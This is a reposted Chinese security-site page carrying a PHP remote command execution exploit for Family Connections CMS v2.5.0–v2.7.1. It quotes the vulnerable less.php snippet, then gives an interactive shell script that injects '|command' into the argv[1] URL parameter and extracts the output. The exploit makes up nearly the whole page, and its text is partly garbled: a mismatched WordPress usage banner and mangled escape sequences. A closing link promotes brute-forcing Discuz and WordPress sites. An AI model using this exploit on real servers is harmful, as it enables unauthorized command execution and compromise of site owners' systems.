Family connections CMS v2.5.0-v2.7.1 远程命令执行漏洞

Family connections CMS v2.5.0-v2.7.1 远程命令执行漏洞，Family Connections CMS v2.5.0-v2.7.1 (less.php) Remote Command Execution，Family connections CMS v2.5.0-v2.7.1 remote command execution exploit。

$theme = isset($argv[1]) ? $argv[1] : 'default';
 
system("clear");
 
if (file_exists("$dir/themes/$theme/style.css"))
{
    echo "n[ themes/$theme/style.css ] already exists.nn";
    echo "Overwrite [ y/n ] ? ";
    $handle = fopen ("php://stdin","r");
    $line = fgets($handle);
    if (trim($line) != 'y')
    {
        exit;
    }
}
 
$worked = system("php -q ~/bin/lessphp/lessc $dir/themes/$theme/dev.less > $dir/themes/$theme/style.css");
 -d  OPTIONS
host:      target server (ip/hostname)
path:      directory path to wordpress
Options:
 -p[ip:port]: specify a proxy
Example:
php ".$argv[0]." -t 192.168.1.5 -d /wp/ -p 127.0.0.1:8080
php ".$argv[0]." -t 192.168.1.5 -d /wp/
-----------------------------------------------------------------------------
"); die;
}
 
error_reporting(7);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);
 
$proxy_regex = "(bd{1,3}.d{1,3}.d{1,3}.d{1,3}b)";
 
function setArgs($argv){
    $_ARG = array();
    foreach ($argv as $arg){
        if (ereg("--([^=]+)=(.*)", $arg, $reg)){
            $_ARG[$reg[1]] = $reg[2];
        }elseif(ereg("^-([a-zA-Z0-9])", $arg, $reg)){
            $_ARG[$reg[1]] = "true";
        }else {
            $_ARG["input"][] = $arg;
        }
    }
    return $_ARG;
}
 
 
$myArgs = setArgs($argv);
$host = $myArgs["input"]["1"];
$path = $myArgs["input"]["2"];
 
if (strpos($host, ":") == true){
    $hostAndPort = explode(":",$myArgs["input"][1]);
    $host = $hostAndPort[0];
    $port = (int)$hostAndPort[1];
}else{
    $port = 80;
}
 
 
if(strcmp($myArgs["p"],"true") === 0){
    $proxyAndPort = explode(":",$myArgs["input"][3]);
    $proxy = $proxyAndPort[0];
    $pport = $proxyAndPort[1];
    echo "(+) Setting the proxy to ".$proxy.":".$pport."rn";
}else{
        echo "(-) Warning, a proxy was not setrn";
}
 
// rgods sendpacketii() function
function sendpacket($packet){
    global $myArgs, $proxy, $host, $pport, $port, $html, $proxy_regex;
    if (strcmp($myArgs["p"],"true") != 0) {
        $ock = fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo "(-) No response from ".$host.":".$port; die;
        }
    }
    else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
            echo "(-) Not a valid proxy...n"; die;
        }
        $ock=fsockopen($proxy,$pport);
        if (!$ock) {
            echo "(-) No response from proxy..."; die;
        }
    }
    fputs($ock,$packet);
    if ($proxy == "") {
        $html = "";
        while (!feof($ock)) {
            $html .= fgets($ock);
        }
    }else {
        $html = "";
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a), $html))) {
            $html .= fread($ock,1);
        }
    }
    fclose($ock);
}
 
if (strcmp($myArgs["p"], "true") != 0) {$p = $path;} else {$p = "http://".$host.":".$port.$path;}
 
function read(){
    $fp1 = fopen("/dev/stdin", "r");
    $input = fgets($fp1, 255);
    fclose($fp1);
    return $input;
}
 
while ($cmd != "q"){
    echo "n".get_current_user()."@".$host."# ";
    $cmd = trim(read());
    $c = urlencode("echo fcms_start;".$cmd.";echo fcms_end");
    $packet = "GET ".$p."dev/less.php?argv[1]=|".$c."; HTTP/1.1rn";
    $packet .= "host: ".$host."rnrn";
    if ($cmd != "q"){
        sendpacket($packet);
        $html = explode("fcms_start",$html);
        $___response = explode("fcms_end",$html[2]);
        echo (trim($___response[0]));
        }
}
?>

文章来源于lcx.cc:Family connections CMS v2.5.0-v2.7.1 远程命令执行漏洞

相关推荐: 暴破Dz、WP，爸爸再也不用担心传统信息安全攻击手段突破不了了。

爸爸再也不用担心传统信息安全攻击手段突破不了了。 Chora (生存、生活、生命。) | 2013-12-03 19:25 当你觉得传统信息安全手段都用完了的时候，你是否想过还有暴力破解啊。现在一般的大型网站都是dz论坛跟wp博客，没有0DAY在手怎么办啊，你…